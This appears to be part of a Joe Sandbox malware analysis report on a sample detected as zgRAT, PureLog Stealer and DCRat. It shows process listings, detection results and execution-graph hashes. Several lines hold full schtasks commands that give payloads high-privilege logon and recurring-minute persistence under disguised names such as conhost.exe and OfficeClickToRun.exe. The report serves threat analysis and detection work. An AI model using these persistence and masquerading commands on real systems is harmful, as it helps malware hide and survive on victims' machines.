                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\All Users\dbg\conhost.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff692720000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:21
                              Start time:09:43:18
                              Start date:25/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 13 /tr "'C:\Users\All Users\dbg\conhost.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff692720000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:22
                              Start time:09:43:18
                              Start date:25/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 7 /tr "'C:\Users\Default\Templates\OfficeClickToRun.exe'" /f
                              Imagebase:0x7ff692720000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:23
                              Start time:09:43:18
                              Start date:25/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Users\Default\Templates\OfficeClickToRun.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff692720000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:24
                              Start time:09:43:18
                              Start date:25/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 14 /tr "'C:\Users\Default\Templates\OfficeClickToRun.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff692720000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:25
                              Start time:09:43:18
                              Start date:25/08/2024
                              Path:C:\ProgramData\dbg\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Users\All Users\dbg\conhost.exe"
                              Imagebase:0xad0000
                              File size:1'957'888 bytes
                              MD5 hash:03EF05FF3B0C058220324C2CE72950F2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ProgramData\dbg\conhost.exe, Author: Joe Security
                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ProgramData\dbg\conhost.exe, Author: Joe Security
                              Antivirus matches:
                              • Detection: 100%, Avira
                              • Detection: 100%, Joe Sandbox ML
                              • Detection: 66%, ReversingLabs
                              • Detection: 55%, Virustotal, Browse
                              Has exited:true

                              Target ID:26
                              Start time:09:43:18
                              Start date:25/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "NjWYKcLujkVoPzemFBegN" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exe'" /f
                              Imagebase:0x7ff692720000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:27
                              Start time:09:43:18
                              Start date:25/08/2024
                              Path:C:\ProgramData\dbg\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Users\All Users\dbg\conhost.exe"
                              Imagebase:0x380000
                              File size:1'957'888 bytes
                              MD5 hash:03EF05FF3B0C058220324C2CE72950F2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:28
                              Start time:09:43:18
                              Start date:25/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "NjWYKcLujkVoPzemFBeg" /sc ONLOGON /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff692720000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:29
                              Start time:09:43:18
                              Start date:25/08/2024
                              Path:C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Wow64 process (32bit):false
                              Commandline:C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              Imagebase:0x50000
                              File size:1'957'888 bytes
                              MD5 hash:03EF05FF3B0C058220324C2CE72950F2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001D.00000002.3350660394.00000000027D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000001D.00000002.3350660394.0000000002AF7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe, Author: Joe Security
                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe, Author: Joe Security
                              Antivirus matches:
                              • Detection: 100%, Avira
                              • Detection: 100%, Joe Sandbox ML
                              • Detection: 66%, ReversingLabs
                              • Detection: 55%, Virustotal, Browse
                              Has exited:false

                              Target ID:30
                              Start time:09:43:18
                              Start date:25/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "NjWYKcLujkVoPzemFBegN" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff692720000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:31
                              Start time:09:43:18
                              Start date:25/08/2024
                              Path:C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exe"
                              Imagebase:0x50000
                              File size:1'957'888 bytes
                              MD5 hash:03EF05FF3B0C058220324C2CE72950F2
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Antivirus matches:
                              • Detection: 66%, ReversingLabs
                              • Detection: 55%, Virustotal, Browse
                              Has exited:true

                              Target ID:32
                              Start time:09:43:18
                              Start date:25/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "ContainerAgentWinSessionC" /sc MINUTE /mo 5 /tr "'C:\FontHost\ContainerAgentWinSession.exe'" /f
                              Imagebase:0x7ff692720000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:33
                              Start time:09:43:18
                              Start date:25/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "ContainerAgentWinSession" /sc ONLOGON /tr "'C:\FontHost\ContainerAgentWinSession.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff692720000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:35
                              Start time:09:43:18
                              Start date:25/08/2024
                              Path:C:\Windows\System32\schtasks.exe
                              Wow64 process (32bit):false
                              Commandline:schtasks.exe /create /tn "ContainerAgentWinSessionC" /sc MINUTE /mo 9 /tr "'C:\FontHost\ContainerAgentWinSession.exe'" /rl HIGHEST /f
                              Imagebase:0x7ff692720000
                              File size:235'008 bytes
                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:37
                              Start time:09:43:19
                              Start date:25/08/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\aQ1wx53V7n.bat"
                              Imagebase:0x7ff69f830000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:38
                              Start time:09:43:19
                              Start date:25/08/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff6d64d0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:39
                              Start time:09:43:19
                              Start date:25/08/2024
                              Path:C:\Windows\System32\chcp.com
                              Wow64 process (32bit):false
                              Commandline:chcp 65001
                              Imagebase:0x7ff6b1fd0000
                              File size:14'848 bytes
                              MD5 hash:33395C4732A49065EA72590B14B64F32
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:40
                              Start time:09:43:19
                              Start date:25/08/2024
                              Path:C:\Windows\System32\w32tm.exe
                              Wow64 process (32bit):false
                              Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                              Imagebase:0x7ff7088a0000
                              File size:108'032 bytes
                              MD5 hash:81A82132737224D324A3E8DA993E2FB5
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:41
                              Start time:09:43:21
                              Start date:25/08/2024
                              Path:C:\FontHost\ContainerAgentWinSession.exe
                              Wow64 process (32bit):false
                              Commandline:C:\FontHost\ContainerAgentWinSession.exe
                              Imagebase:0xd60000
                              File size:1'957'888 bytes
                              MD5 hash:03EF05FF3B0C058220324C2CE72950F2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:42
                              Start time:09:43:21
                              Start date:25/08/2024
                              Path:C:\FontHost\ContainerAgentWinSession.exe
                              Wow64 process (32bit):false
                              Commandline:C:\FontHost\ContainerAgentWinSession.exe
                              Imagebase:0x30000
                              File size:1'957'888 bytes
                              MD5 hash:03EF05FF3B0C058220324C2CE72950F2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:43
                              Start time:09:43:24
                              Start date:25/08/2024
                              Path:C:\ProgramData\dbg\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Users\All Users\dbg\conhost.exe"
                              Imagebase:0xb00000
                              File size:1'957'888 bytes
                              MD5 hash:03EF05FF3B0C058220324C2CE72950F2
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:44
                              Start time:09:43:27
                              Start date:25/08/2024
                              Path:C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exe"
                              Imagebase:0x110000
                              File size:1'957'888 bytes
                              MD5 hash:03EF05FF3B0C058220324C2CE72950F2
                              Has elevated privileges:false
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Has exited:true


                                Execution Graph

                                Execution Coverage:2%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:20%
                                Total number of Nodes:5
                                Total number of Limit Nodes:0

                                Control-flow Graph

                                control_flow_graph 0 4946856-494689d NtQueryInformationProcess GetSystemInfo
                                APIs
                                • NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,00000000), ref: 0494686C
                                • GetSystemInfo.KERNELBASE(?), ref: 0494687E
                                Memory Dump Source
                                • Source File: 00000000.00000002.2095127165.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4940000_Nerolore.jbxd
                                Similarity
                                • API ID: InfoInformationProcessQuerySystem
                                • String ID:
                                • API String ID: 1993426926-0

                                Control-flow Graph

                                control_flow_graph 60 49466f5-4946708 RtlExitUserProcess 61 4946715-49467ee 60->61
                                APIs
                                • RtlExitUserProcess.NTDLL(?,77E8F3B0,000000FF), ref: 04946702
                                Memory Dump Source
                                • Source File: 00000000.00000002.2095127165.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4940000_Nerolore.jbxd
                                Similarity
                                • API ID: ExitProcessUser
                                • String ID:
                                • API String ID: 3902816426-0

                                Control-flow Graph

                                control_flow_graph 66 115f598-115f5a3 67 115f5a5-115f5aa 66->67 68 115f5ac-115f5af 66->68 69 115f5b6-115f5ca VirtualAlloc 67->69 68->69 70 115f5b1 68->70 70->69
                                APIs
                                • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 0115F5C3
                                Memory Dump Source
                                • Source File: 00000000.00000002.2093218096.0000000001153000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF2000, based on PE: true
                                • Associated: 00000000.00000002.2093218096.0000000000FF2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2093218096.0000000001133000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2093218096.0000000001138000.00000040.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_f00000_Nerolore.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0

                                Control-flow Graph

                                control_flow_graph 243 10b7a80-10b7a8f call ff8e14 246 10b7a94-10b7a99 call 1001b84 243->246 248 10b7a9e-10b7aa1 246->248 249 10b7b27-10b7b2a 248->249 250 10b7aa7-10b7ab5 248->250 251 10b7b38-10b7b3a 249->251 252 10b7b2c-10b7b36 call 10b786c 249->252 253 10b7ab7-10b7ac2 250->253 254 10b7b25 250->254 251->246 252->251 253->254 256 10b7ac4-10b7ae6 call ff8e14 253->256 254->249 260 10b7ae8-10b7afe 256->260 261 10b7b00-10b7b0e 256->261 260->261 261->254 262 10b7b10-10b7b20 call 10b824c 261->262 262->254
                                Memory Dump Source
                                • Source File: 00000000.00000002.2093218096.0000000000FF2000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                • Associated: 00000000.00000002.2093054972.0000000000F00000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2093071531.0000000000F01000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2093071531.0000000000F3E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2093071531.0000000000F45000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2093071531.0000000000F62000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2093071531.0000000000FA8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2093171653.0000000000FAE000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2093171653.0000000000FF0000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2093218096.0000000001133000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2093218096.0000000001138000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2093218096.0000000001153000.00000040.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_f00000_Nerolore.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2095127165.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4940000_Nerolore.jbxd
                                Similarity
                                • API ID:
                                • String ID: b=q=
                                • API String ID: 0-4069823217
                                Memory Dump Source
                                • Source File: 00000000.00000002.2095127165.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4940000_Nerolore.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                Memory Dump Source
                                • Source File: 00000000.00000002.2095127165.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4940000_Nerolore.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:

                                Execution Graph

                                Execution Coverage:9.9%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:3
                                Total number of Limit Nodes:0
                                execution_graph 7866 7ff84928ece1 7867 7ff84928ecff QueryFullProcessImageNameA 7866->7867 7869 7ff84928eea4 7867->7869

                                Control-flow Graph

                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2297318802.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7ff848e90000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID: 5X_H
                                • API String ID: 0-3241812158
                                Memory Dump Source
                                • Source File: 00000005.00000002.2297318802.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7ff848e90000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:

                                Control-flow Graph

                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.2301797274.00007FF849280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849280000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7ff849280000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID: FullImageNameProcessQuery
                                • String ID:
                                • API String ID: 3578328331-0

                                Control-flow Graph

                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.2297318802.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7ff848e90000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID: cK_H
                                • API String ID: 0-826043881
                                Memory Dump Source
                                • Source File: 00000005.00000002.2297318802.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7ff848e90000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 323b7e45a8aac7bf7cea1d31a7eba6e259066ad1cdc8d476df9ffb0a687d89ed
                                • Instruction ID: b4f9bfcc1c1dbd69ca597215f88b331fe7fe4d34ce35816be2a24c0538839b68
                                • Opcode Fuzzy Hash: 323b7e45a8aac7bf7cea1d31a7eba6e259066ad1cdc8d476df9ffb0a687d89ed
                                • Instruction Fuzzy Hash: 4821EA3170CC194FD768EA5CE889DB973D1FF9932170501BAE58EC7125E961EC8287C5
                                Memory Dump Source
                                • Source File: 00000005.00000002.2297318802.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7ff848e90000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 201382351f77987942a27db80f82e225ea23f38df349864c52c8f610f2e00c94
                                • Instruction ID: 992a74f185b512906157d389d59e2d8603a7da90c4679183ba7a27a128936c52
                                • Opcode Fuzzy Hash: 201382351f77987942a27db80f82e225ea23f38df349864c52c8f610f2e00c94
                                • Instruction Fuzzy Hash: B0212220B1C9595FE788B66C845A77972C2FB99365F1400BAE80EC33DBDE38AC418684
                                Memory Dump Source
                                • Source File: 00000005.00000002.2297318802.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7ff848e90000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1fba2b437da24efd37ef0cd9078c24565b0cddf9f181ee2ef9150c7a5a3b7eaf
                                • Instruction ID: cce05e14113d5381f17d6abe8096df2517fc6466b75dea23de89392a61b7caba
                                • Opcode Fuzzy Hash: 1fba2b437da24efd37ef0cd9078c24565b0cddf9f181ee2ef9150c7a5a3b7eaf
                                • Instruction Fuzzy Hash: F431A231A0C54A8FEB45FB68C854AF97BF1FF66350F4501BAC009D7292DB79A941CB50
                                Memory Dump Source
                                • Source File: 00000005.00000002.2297318802.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7ff848e90000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 708fd598c065309b6541ab05387ea6579458b0a2b96279e759eeba44057c0858
                                • Instruction ID: 00d6a7c14118ac430a6604ed35b7cdd95eb0fb2f73c0584fd6f1d0f02ca34c5c
                                • Opcode Fuzzy Hash: 708fd598c065309b6541ab05387ea6579458b0a2b96279e759eeba44057c0858
                                • Instruction Fuzzy Hash: 05214B36A0D649AFE716B7B8D8010EC7B60FF423A4F4881B3C0088B1D3DB78254AC799
                                Memory Dump Source
                                • Source File: 00000005.00000002.2297318802.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7ff848e90000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bc4e37843ed38148d2f6a542dc3a4f9fc9f4492120359c64c430d6bf4d260611
                                • Instruction ID: cf38bec96cb45d447ad1078e5236fba8e43c672cd2e68cf8dd23c29f6f354312
                                • Opcode Fuzzy Hash: bc4e37843ed38148d2f6a542dc3a4f9fc9f4492120359c64c430d6bf4d260611
                                • Instruction Fuzzy Hash: 6F01FC31F0D91D0F9568E15E944A93673C2E7C6674B191279D84FC3255DEA0AC5342C4
                                Memory Dump Source
                                • Source File: 00000005.00000002.2297318802.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7ff848e90000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: bcb80ac75be82548596fe27c1c22e4842d79d5a09fe0d9492bdee810de7f305f
                                • Instruction ID: d5749039f75abe3f6a94fef968240a6bb89fd36a6acf83d05db70fdd6f985a24
                                • Opcode Fuzzy Hash: bcb80ac75be82548596fe27c1c22e4842d79d5a09fe0d9492bdee810de7f305f
                                • Instruction Fuzzy Hash: 3C21FC30D0852DCFDBA9EB04C495BAAB3B1FB58355F1041BAC00EA32A4DBB5ADC0CB45
                                Memory Dump Source
                                • Source File: 00000005.00000002.2297318802.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7ff848e90000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b4964150383954b856b39dfe5a8a5f7d2c54ef45414215a71416b779df71fcc2
                                • Instruction ID: 16af7271c192319fac222d84e70295aab5951ca95b88a19c60cb8574779fc75f
                                • Opcode Fuzzy Hash: b4964150383954b856b39dfe5a8a5f7d2c54ef45414215a71416b779df71fcc2
                                • Instruction Fuzzy Hash: C7116131E188099FEB98FB7C9059A6863D1FF68394F4400B5D40EC72A7DE64DC468744
                                Memory Dump Source
                                • Source File: 00000005.00000002.2297318802.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7ff848e90000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: decf81c4f982908bcc34f923b849cc09361c72faca74904887ed8a0f23aaf13d
                                • Instruction ID: 26f42adde0ec78df75b34a737ac428a8f5318236501f5cf9abfc03128a487b2b
                                • Opcode Fuzzy Hash: decf81c4f982908bcc34f923b849cc09361c72faca74904887ed8a0f23aaf13d
                                • Instruction Fuzzy Hash: 3E11C231A0D7899FE702FBB888551AC7BB0FF42394F5544F7C044DB2A2D6781649CB95
                                Memory Dump Source
                                • Source File: 00000005.00000002.2297318802.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7ff848e90000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4d2618250addc08769adf86ee29ab295a5e2dc34272934cd9fc2a2b0e315111c
                                • Instruction ID: 37ee0b4aec60d2667a370f72349aef8808cfdad5a951eea69653529b7930b41e
                                • Opcode Fuzzy Hash: 4d2618250addc08769adf86ee29ab295a5e2dc34272934cd9fc2a2b0e315111c
                                • Instruction Fuzzy Hash: BF11AD31A0D7899FE706FBB888550AC7FB0FF42394F5541F6C044DB2A2D6782A49CB95
                                Memory Dump Source
                                • Source File: 00000005.00000002.2297318802.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7ff848e90000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 09ddbb158f2b8f4bc2322e2d7f9fd1fc0969d01b76312e455351d8522a9537c7
                                • Instruction ID: a815f573088b94aee8fb7e34eba6de2f4270d9db5fa6abb580fa19fa32bb54a6
                                • Opcode Fuzzy Hash: 09ddbb158f2b8f4bc2322e2d7f9fd1fc0969d01b76312e455351d8522a9537c7
                                • Instruction Fuzzy Hash: 2A019E3190D7899FE706FBB8C84409CBFB0FF42344F5541E6C044DB2A2D6786A48CB81
                                Memory Dump Source
                                • Source File: 00000005.00000002.2297318802.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7ff848e90000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ef398adeb80fbd3785f66ec4de651f706265fc963689c4077fc2c0da828842a3
                                • Instruction ID: 07c0158dbfeedd7d846d936881780579ff7598f1786c0300fe9fa27aca73a833
                                • Opcode Fuzzy Hash: ef398adeb80fbd3785f66ec4de651f706265fc963689c4077fc2c0da828842a3
                                • Instruction Fuzzy Hash: 8C018F30D0D789AFE706FBB488540ACBFB0FF02348F5441E6C044DB296DA785A44CB45
                                Memory Dump Source
                                • Source File: 00000005.00000002.2297318802.00007FF848E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E90000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_7ff848e90000_ContainerAgentWinSession.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 788b18ddfbad803b65fbd3d6ce7d1aec744b3b9622c7d5703f5c56da80ea7097
                                • Instruction ID: 4874c647f61bfd1c0424b24d179a3e7ae5a382ffad72da176d1e385fb71cf967
